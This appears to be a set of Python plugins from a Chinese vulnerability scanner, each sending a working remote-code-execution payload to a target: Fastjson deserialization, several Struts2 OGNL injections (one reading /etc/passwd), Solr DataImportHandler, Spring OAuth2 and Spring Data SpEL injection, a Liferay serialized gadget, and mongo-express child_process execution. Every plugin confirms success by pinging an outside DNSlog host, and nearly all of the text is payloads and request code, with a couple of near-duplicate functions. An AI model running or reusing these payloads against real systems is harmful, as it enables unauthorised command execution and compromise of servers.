def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + '://' + url + ':' + str(port) DL = Dnslog() data = { "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://" + DL.dns_host() + "//Exploit", "autoCommit": True } } data = json.dumps(data) Headers['Content-Type'] = 'application/json' Headers["Connection"] = "close" resp = requests.post(payload_url, headers=Headers, data=data, proxies=proxies, timeout=10, verify=False) if DL.result() and resp.status_code == 500: Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format( url, payload_url, resp.text, DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port, path = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = Dnslog() con = "" data = b"""-----------------------------735323031399963166993862150 Content-Disposition: form-data; name="foo"; filename="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00" Content-Type: text/plain x -----------------------------735323031399963166993862150-- """ try: payload_url = scheme + "://" + url + ":" + str(port) + path Headers["Content-Length"] = "10000000" Headers[ "Content-Type"] = "multipart/form-data; boundary=---------------------------735323031399963166993862150" try: #防止在linux系统上执行了POC,导致超时扫描不到漏洞 resp = requests.post(payload_url, headers=Headers, data=data, timeout=6, proxies=proxies, verify=False) con = resp.text except Exception as e: pass time.sleep(2) if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-046)\r\n漏洞详情:\r\n版本号:S2-046\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format( url, data, con, DL.dns_text(), DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + "://" + url + ":" + str( port) + '/solr/admin/cores' step1 = requests.get(payload_url, timeout=6, proxies=proxies, headers=Headers).text data = json.loads(step1) if 'status' in data: name = '' for x in data['status']: name = x payload = "/solr/" + name + "/dataimport?_=1582117587113&indent=on&wt=json" payload_url = scheme + "://" + url + ":" + str(port) + payload Headers['Accept'] = 'application/json' Headers["Content-Type"] = "application/x-www-form-urlencoded" Headers["X-Requested-With"] = "XMLHttpRequest" DL = Dnslog() # 初始化DNSlog #POC没问题DNSlog有问题 # DL="p61rpm.dnslog.cn" data2 = "command=full-import&verbose=false&clean=false&commit=true&debug=true&core=" + name + "&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22ping+{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format( DL.dns_host()) resp = requests.post(payload_url, data=data2, headers=Headers, proxies=proxies, timeout=6, verify=False) if DL.result(): Medusa = "{}存在Solr远程代码执行漏洞(CVE-2019-0193)\r\n 验证数据:\r\n漏洞位置:{}\r\nPOST包:{}\r\n".format( url, payload_url, data2) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port, path = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = Dnslog() con = "" payload1 = '%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27' + "ping%20" + DL.dns_host( ) + '%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/' payload2 = "%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27" + "ping%20" + DL.dns_host( ) + "%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/" for payload in [payload1, payload2]: try: path1 = os.path.split(path)[0] path2 = os.path.split(path)[1] payload_url = scheme + "://" + url + ":" + str( port) + path1 + "/" + payload + path2 headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } try: # 防止在linux系统上执行了POC,导致超时扫描不到漏洞 resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False, allow_redirects=False) con = resp.text except: pass if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-057)\r\n漏洞详情:\r\n版本号:S2-057\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format( url, payload_url, con, DL.dns_text(), DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } DL = Dnslog() payload = "/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format( DL.dns_host()) payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=6, verify=False) time.sleep(4) if DL.result(): Medusa = "{}存在SpringSecurityOauth2远程代码执行漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format( url, resp.text, DL.dns_host(), str(DL.dns_text())) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/api/jsonws/invoke' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close" } DL = Dnslog() #DL="http://333.q7d5zn.dnslog.cn".encode('utf-8') hex_data = b'\xac\xed\x00\x05sr\x00=com.mchange.v2.naming.ReferenceIndirector$ReferenceSerializedb\x19\x85\xd0\xd1*\xc2\x13\x02\x00\x04L\x00\x0bcontextNamet\x00\x13Ljavax/naming/Name;L\x00\x03envt\x00\x15Ljava/util/Hashtable;L\x00\x04nameq\x00~\x00\x01L\x00\treferencet\x00\x18Ljavax/naming/Reference;xppppsr\x00\x16javax.naming.Reference\xe8\xc6\x9e\xa2\xa8\xe9\x8d\t\x02\x00\x04L\x00\x05addrst\x00\x12Ljava/util/Vector;L\x00\x0cclassFactoryt\x00\x12Ljava/lang/String;L\x00\x14classFactoryLocationq\x00~\x00\x07L\x00\tclassNameq\x00~\x00\x07xpsr\x00\x10java.util.Vector\xd9\x97}[\x80;\xaf\x01\x03\x00\x03I\x00\x11capacityIncrementI\x00\x0celementCount[\x00\x0belementDatat\x00\x13[Ljava/lang/Object;xp\x00\x00\x00\x00\x00\x00\x00\x00ur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s)l\x02\x00\x00xp\x00\x00\x00\nppppppppppxt\x00\x03Expt\x00\x1b%st\x00\x03Foo' % DL.dns_host( ).encode('utf-8') data = str(binascii.hexlify(hex_data), encoding="utf-8") post_data = """cmd={"/expandocolumn/update-column":{}}&p_auth=<validtoken>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:""" + data + """;"}""" resp = requests.post(payload_url, data=post_data, headers=headers, proxies=proxies, timeout=6, verify=False) time.sleep(3) if DL.result(): Medusa = "{}存在LiferayPortal远程命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\nPOST数据包:{}\r\n随机的DNSLOG:{}\r\n返回数据包:{}\r\n".format( url, payload_url, post_data, DL.dns_host(), resp.text) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/checkValid" payload_url = scheme + "://" + url + ":" + str(port) + payload dns = Dnslog() data = 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping {}")'.format( dns.dns_host()) headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, 'Authorization': 'Basic YWRtaW46cGFzcw==', 'Connection': 'close', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '123' } s = requests.session() s.post(payload_url, data=data, headers=headers, timeout=6, proxies=proxies, verify=False) time.sleep(10) if dns.result(): Medusa = "{} 存在mongo-express远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\npayload:{}".format( url, payload_url, data) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, Token).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port, path = UrlProcessing().result(Url) #这个系列的洞需要用到路径 if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = Dnslog() linux_payload = "?(%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003dfalse%27)(bla)(bla)&(%27%5cu0023_memberAccess.excludeProperties%[email protected]@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27%5cu0023_memberAccess.allowStaticMethodAccess%5cu003dtrue%27)(bla)(bla)&(%27%5cu0023mycmd%5cu003d%5c%27cat+/etc/passwd%5c%27%27)(bla)(bla)&(%27%5cu0023myret%[email protected]@getRuntime().exec(%5cu0023mycmd)%27)(bla)(bla)&(A)((%27%5cu0023mydat%5cu003dnew%5c40java.io.DataInputStream(%5cu0023myret.getInputStream())%27)(bla))&(B)((%27%5cu0023myres%5cu003dnew%5c40byte[51020]%27)(bla))&(C)((%27%5cu0023mydat.readFully(%5cu0023myres)%27)(bla))&(D)((%27%5cu0023mystr%5cu003dnew%5c40java.lang.String(%5cu0023myres)%27)(bla))&(%27%5cu0023myout%[email protected]@getResponse()%27)(bla)(bla)&(E)((%27%5cu0023myout.getWriter().println(%5cu0023mystr)%27)(bla))" windows_payload = "?(%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003dfalse%27)(bla)(bla)&(%27%5cu0023_memberAccess.excludeProperties%[email protected]@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27%5cu0023_memberAccess.allowStaticMethodAccess%5cu003dtrue%27)(bla)(bla)&(%27%5cu0023mycmd%5cu003d%5c%27ping+{}%5c%27%27)(bla)(bla)&(%27%5cu0023myret%[email protected]@getRuntime().exec(%5cu0023mycmd)%27)(bla)(bla)&(A)((%27%5cu0023mydat%5cu003dnew%5c40java.io.DataInputStream(%5cu0023myret.getInputStream())%27)(bla))&(B)((%27%5cu0023myres%5cu003dnew%5c40byte[51020]%27)(bla))&(C)((%27%5cu0023mydat.readFully(%5cu0023myres)%27)(bla))&(D)((%27%5cu0023mystr%5cu003dnew%5c40java.lang.String(%5cu0023myres)%27)(bla))&(%27%5cu0023myout%[email protected]@getResponse()%27)(bla)(bla)&(E)((%27%5cu0023myout.getWriter().println(%5cu0023mystr)%27)(bla))".format( DL.dns_host()) for payload in [linux_payload, windows_payload]: try: payload_url = scheme + "://" + url + ":" + str( port) + path + payload headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) code = resp.status_code con = resp.text if (code == 200 and con.find('root:') != -1 and con.find('/bin/bash') != -1 and con.find('bin:') != -1) or DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-005)\r\n漏洞详情:\r\n影响版本:2.0.0-2.1.8.1\r\nPayload:{}\r\n返回执行内容:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e ) # 调用写入类传入URL和错误插件名og().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL = Dnslog() data = """username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx""" % DL.dns_host( ) payload = "/users?page=&size=5" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Referer": payload_url } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) time.sleep(4) if DL.result(): Medusa = "{}存在SpringDataCommons远程命令执行漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format( url, resp.text, DL.dns_host(), str(DL.dns_text())) print(Medusa) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/checkValid" payload_url = scheme + "://" + url + ":" + str(port) + payload dns = Dnslog() data = 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping {}")'.format( dns.dns_host()) Headers['Accept'] = '*/*' Headers['Authorization'] = 'Basic YWRtaW46cGFzcw==' Headers['Connection'] = 'close' Headers['Content-Type'] = 'application/x-www-form-urlencoded' Headers['Content-Length'] = '123' requests.post(payload_url, data=data, headers=Headers, timeout=6, proxies=proxies, verify=False) time.sleep(10) if dns.result(): Medusa = "{} 存在mongo-express远程代码执行漏洞(CVE-2019-10758)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\npayload:{}".format( url, payload_url, data) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类